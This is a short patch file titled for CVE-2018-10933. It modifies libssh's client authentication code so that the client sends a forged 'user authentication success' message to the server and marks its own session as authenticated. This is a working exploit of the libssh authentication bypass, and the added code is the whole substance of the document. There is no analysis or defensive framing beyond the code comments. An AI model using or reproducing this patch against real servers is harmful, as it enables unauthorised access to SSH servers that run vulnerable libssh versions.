cve-2018-10933.patch

--- src/auth.c	2018-10-19 01:15:21.246145402 +0000
+++ src/auth.c	2018-10-19 01:16:06.802096017 +0000
@@ -145,7 +145,16 @@
     if (!ssh_auth_response_termination(session)) {
         return SSH_AUTH_AGAIN;
     }
-
+    /* we tried to authenticate, so send an authentication success packet to break state machine */
+    ssh_buffer_pack(session->out_buffer, "bsss",SSH2_MSG_USERAUTH_SUCCESS,session->opts.username,"ssh-connection","none");
+    ssh_packet_send(session);
+    /* set the client side session settings & clear errors */
+    session->auth.state = SSH_AUTH_STATE_SUCCESS;
+    session->session_state = SSH_SESSION_STATE_AUTHENTICATED;
+    session->flags |= SSH_SESSION_FLAG_AUTHENTICATED;
+    ssh_reset_error(session);
+    session->auth.current_method = SSH_AUTH_METHOD_UNKNOWN;
+    /* the library will force return SSH_AUTH_STATE_SUCCESS now */
     switch(session->auth.state) {
         case SSH_AUTH_STATE_ERROR:
             rc = SSH_AUTH_ERROR;